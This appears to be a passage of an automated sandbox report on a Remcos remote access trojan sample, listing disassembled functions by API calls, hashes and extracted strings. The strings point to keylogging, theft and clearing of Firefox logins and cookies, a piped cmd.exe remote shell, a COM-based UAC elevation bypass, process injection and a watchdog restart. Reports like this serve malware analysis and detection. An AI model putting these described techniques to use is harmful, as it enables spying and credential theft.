                        • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                        • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 448299; basic blocks 448299-44831d
                        • Calls in flow order: GetLastError, 4487bc, 445af3, 448812, 446782, 448087, SetLastError (two sites)
                        APIs
                        • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                        • _free.LIBCMT ref: 004482D3
                        • _free.LIBCMT ref: 004482FA
                        • SetLastError.KERNEL32(00000000), ref: 00448307
                        • SetLastError.KERNEL32(00000000), ref: 00448310
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 448566; basic blocks 448566-4485e0
                        • Calls in flow order: LoadLibraryExW, GetLastError, LoadLibraryExW (fallback site), FreeLibrary
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                        • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Single block 40d069-40d095: call 401fab, CreateMutexA, GetLastError
                        APIs
                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                        • GetLastError.KERNEL32 ref: 0040D083
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateErrorLastMutex
                        • String ID: SG
                        • API String ID: 1925916568-3189917014
                        • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                        • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 4484ca; basic blocks 4484ca-448565
                        • Calls in flow order: 448566, GetProcAddress, 43436e
                        APIs
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc__crt_fast_encode_pointer
                        • String ID:
                        • API String ID: 2279764990-0
                        • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                        • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                        • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                        • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 40165e; basic blocks 40165e-4016b3
                        • Calls: 4344ea (two sites)
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                        • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                        • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                        • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 445af3; basic blocks 445af3-445b4f
                        • Calls in flow order: RtlAllocateHeap, 445545, 442f80, 4405dd
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                        • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                        • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                        • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC

                        Control-flow Graph (summary; rendered graph not preserved, executed/not-executed colouring lost)
                        • Entry block 446137; basic blocks 446137-446184
                        • Calls in flow order: RtlAllocateHeap, 445545, 442f80, 4405dd
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                        • DeleteFileA.KERNEL32(?), ref: 00408652
                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                        • API String ID: 1067849700-181434739
                        • Opcode ID: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                        • Opcode Fuzzy Hash: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 004056E6
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • __Init_thread_footer.LIBCMT ref: 00405723
                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                        • CloseHandle.KERNEL32 ref: 00405A23
                        • CloseHandle.KERNEL32 ref: 00405A2B
                        • CloseHandle.KERNEL32 ref: 00405A3D
                        • CloseHandle.KERNEL32 ref: 00405A45
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                        • API String ID: 2994406822-18413064
                        • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                          • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                          • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                        • API String ID: 3018269243-13974260
                        • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                        • API String ID: 1164774033-3681987949
                        • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                        APIs
                        • OpenClipboard.USER32 ref: 004168C2
                        • EmptyClipboard.USER32 ref: 004168D0
                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                        • GlobalLock.KERNEL32(00000000), ref: 004168F9
                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                        • CloseClipboard.USER32 ref: 00416955
                        • OpenClipboard.USER32 ref: 0041695C
                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                        • CloseClipboard.USER32 ref: 00416984
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                        • String ID: !D@
                        • API String ID: 3520204547-604454484
                        • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                        APIs
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Find$Close$File$FirstNext
                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 3527384056-432212279
                        • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                        • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                        • API String ID: 3756808967-1743721670
                        • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID:
                        • String ID: 0$1$2$3$4$5$6$7$VG
                        • API String ID: 0-1861860590
                        • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                        APIs
                        • _wcslen.LIBCMT ref: 00407521
                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Object_wcslen
                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • API String ID: 240030777-3166923314
                        • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                        • GetLastError.KERNEL32 ref: 0041A7BB
                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                        • String ID:
                        • API String ID: 3587775597-0
                        • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                        • String ID: lJD$lJD$lJD
                        • API String ID: 745075371-479184356
                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Find$CloseFile$FirstNext
                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                        • API String ID: 1164774033-405221262
                        • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                        • GetLastError.KERNEL32 ref: 0040A2ED
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                        • TranslateMessage.USER32(?), ref: 0040A34A
                        • DispatchMessageA.USER32(?), ref: 0040A355
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                        • String ID: Keylogger initialization failure: error $`#v
                        • API String ID: 3219506041-3226811161
                        • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                        • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                        • String ID:
                        • API String ID: 2341273852-0
                        • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        Memory Dump Source
